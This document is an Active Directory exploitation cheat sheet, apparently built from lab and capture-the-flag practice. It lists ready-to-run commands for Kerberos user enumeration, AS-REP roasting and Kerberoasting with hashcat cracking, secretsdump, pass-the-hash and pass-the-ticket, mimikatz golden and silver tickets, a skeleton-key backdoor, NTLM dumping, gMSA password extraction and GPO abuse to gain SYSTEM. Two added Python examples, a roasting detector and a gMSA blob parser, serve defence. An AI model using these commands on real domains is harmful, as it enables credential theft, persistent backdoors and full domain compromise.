Kerberos (88) / Active Directory (AD)
Active Directory Exploitation Cheat Sheet
S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Enumeration
AD LDAP enumeration
ldapsearch -x -h $IP -s base
# to get the naming context
ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec"
# using naming context found above
Impacket-GetNPUsers
The command below checks for accounts that do not require Kerberos pre-authentication and writes their AS-REP hashes in hashcat format. Crack them with hashcat (mode 18200).
impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers.hashcat
hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt
Kerbrute Enumeration - No domain access required
./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst
impacket-secretsdump - Authenticated user
impacket-secretsdump -just-dc THM-AD/backup:[email protected]
Pass the Hash through Evil-WinRM
evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Pass the Ticket - Access as a user to the domain required
rubeus.exe harvest /interval:30
(harvest for TGTs every 30 seconds)
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting - Access as any user required
Rubeus Method
Rubeus.exe kerberoast
Now that you have some hashes, save them into a text file and crack them with hashcat.
hashcat -m 13100 -a 0 hash.txt Pass.txt
Impacket Method
sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request
AS-REP Roasting - Access as any user required
rubeus.exe asreproast
When adding the hashes to a text file, remember to add 23$ after $krb5asrep$, so that the first line reads $krb5asrep$23$User...
hashcat -m 18200 hash.txt pass.txt
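Defender's view of the two roasting techniques above (and of the GetNPUsers check earlier on this page), as an added example that is not part of the cheat sheet: detection logic run over constructed records in the shape of parsed Windows Security events 4768 (TGT request) and 4769 (service ticket request). AS-REP roasting shows up as a successful 4768 with Pre-Authentication Type 0 and an RC4 (0x17) ticket; Kerberoasting as one client requesting RC4 service tickets for several SPNs backed by user accounts. Field names, IPs and account names are constructed.

```python
from collections import defaultdict

RC4 = "0x17"  # etype 23, the encryption type both roasting tools commonly request

# Constructed records in the shape of parsed Security events 4768 (TGT request)
# and 4769 (service ticket request); not real logs.
EVENTS = [
    {"id": 4768, "user": "svc-admin", "preauth": "0", "etype": RC4, "ip": "10.10.14.5", "status": "0x0"},
    {"id": 4768, "user": "jdoe", "preauth": "2", "etype": "0x12", "ip": "10.10.14.7", "status": "0x0"},
    {"id": 4769, "user": "jdoe", "service": "SQLService", "etype": RC4, "ip": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "user": "jdoe", "service": "HTTPService", "etype": RC4, "ip": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "user": "jdoe", "service": "WS01$", "etype": "0x12", "ip": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "user": "jdoe", "service": "krbtgt", "etype": "0x12", "ip": "10.10.14.5", "status": "0x0"},
]

def find_asrep_roast(events):
    """AS-REP roasting: a successful 4768 with PreAuthType 0 (no pre-auth) and an RC4
    ticket means the AS-REP for that account can be cracked offline (hashcat 18200)."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["preauth"] == "0"
                   and e["etype"] == RC4 and e["status"] == "0x0"})

def find_kerberoast(events, min_services=2):
    """Kerberoasting: one source requesting RC4 service tickets for several SPNs
    backed by user accounts (machine accounts end in '$', krbtgt is the TGT itself)."""
    per_ip = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4 or e["status"] != "0x0":
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        per_ip[e["ip"]].add(svc)
    return {ip: sorted(s) for ip, s in per_ip.items() if len(s) >= min_services}

if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", find_asrep_roast(EVENTS))
    print("Possible Kerberoasting sources:", find_kerberoast(EVENTS))
```

On a real estate the same logic reads the parsed EVTX fields; accounts that only ever legitimately use AES make the RC4 filter a strong signal.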
Pass the Ticket w/ mimikatz
Run mimikatz.exe
Run privilege::debug
Ensure this outputs Privilege '20' OK
sekurlsa::tickets /export
Look for a .kirbi file for an account you may already have access to, such as the Administrator account.
Run kerberos::ptt $ticketFile
to impersonate the given ticket.
Exit mimikatz and run klist
to confirm you are using the cached ticket.
You should now have Domain Admin rights.
Golden/Silver Ticket Attacks w/ mimikatz
Golden ticket means that you forge a TGT (with the krbtgt hash) and can use it to obtain tickets for any service you want.
Full domain compromise (domain admin) required.
Silver ticket means that you forge a ticket for one specific service and can impersonate users to that service.
Service account hash required.
Skeleton Key
Full domain compromise (domain admin) required.
Run mimikatz
privilege::debug to confirm access
lsadump::lsa /inject /name:krbtgt
to dump hashes and other identifiers needed to create a golden ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
You will need to know the user's User ID (the RID, the last part of the SID) for the next mimikatz command. You can find it by running the command below (look at the last 3-4 digits).
wmic useraccount where name='%username%' get sid
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500
This is the command for creating a golden ticket; to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.
misc::cmd
This will open a new elevated command prompt that carries the ticket injected in mimikatz; your permissions now depend on whether a golden or a silver ticket was used.
Dump all NTLM hashes with mimikatz
lsadump::lsa /patch
Crack with hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt
Kerberos Backdoors w/ mimikatz
misc::skeleton
net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz
(once the skeleton key is injected, the password mimikatz is accepted for any domain account alongside the real one)
Exploitation
Group Managed Service Accounts (GMSA)
Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.
These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.
Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword
If we have access to an account that is listed in that property, directly or through one of the listed groups, then we should be able to read the service account's managed password and derive its hash.
*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'
DistinguishedName : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : svc_apache
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName : svc_apache$
SID : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName :
*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...
Looks like we have the ReadGMSAPassword privilege on the svc_apache account.
We can retrieve the password hash with GMSAPasswordReader.
*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : EA5055089775D4E018B085C20648D794
[*] aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*] aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*] des_cbc_md5 : 312FDCDA9DADDCCD
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*] aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*] aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*] des_cbc_md5 : 9E340723700454E9
We have the service account password hash and can use this for pass the hash logins (evil-winrm needs the $ sign at the end when logging in with hash).
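The {1, 0, 0, 0, 36, ...} bytes printed from $mp above are the msDS-ManagedPassword attribute, an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.20); that blob is what a principal with ReadGMSAPassword actually obtains and what GMSAPasswordReader turns into the hashes shown. As an added example that is not from the cheat sheet or from GMSAPasswordReader, here is a parser for that layout, exercised on a blob constructed here (the builder exists only to keep the example self-contained and offline).

```python
import struct

# msDS-ManagedPassword layout (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.20), little-endian:
#   Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2) PreviousPasswordOffset(2)
#   QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2)
# followed by null-terminated UTF-16LE passwords, alignment padding and two 64-bit
# intervals in 100-nanosecond units. The "1, 0, 0, 0, ..." seen in PowerShell is Version=1.
HEADER = struct.Struct("<HHIHHHH")  # 16 bytes
TICKS_PER_SECOND = 10_000_000

def _wstr(blob, offset):
    """Read a null-terminated UTF-16LE string starting at offset (bounded by blob size)."""
    end = offset
    while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    return blob[offset:end].decode("utf-16-le")

def parse_managed_password(blob):
    version, reserved, length, cur_off, prev_off, qpi_off, upi_off = HEADER.unpack_from(blob, 0)
    if version != 1 or reserved != 0:
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    if length != len(blob):
        raise ValueError(f"Length field {length} does not match blob size {len(blob)}")
    query_ticks, = struct.unpack_from("<Q", blob, qpi_off)
    unchanged_ticks, = struct.unpack_from("<Q", blob, upi_off)
    return {
        "current_password": _wstr(blob, cur_off),
        # PreviousPasswordOffset is 0 when no previous password is stored
        "previous_password": _wstr(blob, prev_off) if prev_off else None,
        "query_interval_s": query_ticks // TICKS_PER_SECOND,
        "unchanged_interval_s": unchanged_ticks // TICKS_PER_SECOND,
    }

def build_managed_password(current, previous, query_s, unchanged_s):
    """Constructed blob in the same layout, only so the example can run offline."""
    body = bytearray(current.encode("utf-16-le") + b"\x00\x00")
    cur_off, prev_off = HEADER.size, 0
    if previous is not None:
        prev_off = HEADER.size + len(body)
        body += previous.encode("utf-16-le") + b"\x00\x00"
    while (HEADER.size + len(body)) % 8:  # pad so the intervals are 8-byte aligned
        body += b"\x00"
    qpi_off = HEADER.size + len(body)
    body += struct.pack("<Q", query_s * TICKS_PER_SECOND)
    upi_off = HEADER.size + len(body)
    body += struct.pack("<Q", unchanged_s * TICKS_PER_SECOND)
    length = HEADER.size + len(body)
    return HEADER.pack(1, 0, length, cur_off, prev_off, qpi_off, upi_off) + bytes(body)
```

The two intervals are why the tool prints an "Old Value" and a "Current Value": the blob carries the previous password through the rollover window so that hosts with a stale copy still authenticate.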
ZeroLogon
The full exploit resets the domain controller's machine account password and will break Active Directory, so only run the check mode to see whether the DC is vulnerable:
python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP
GPO Abuse via SharpGPOAbuse
If our user holds the GpoEditDeleteModifySecurity permission on a GPO, we can use it to give ourselves local administrator privileges. We can confirm this by running Get-NetGPO to list the GPOs, then checking our permissions on the GPO's GUID:
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /force
updates Group Policies
net localgroup Administrators
verify we are now in the Administrator group
python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:[email protected]
to get SYSTEM access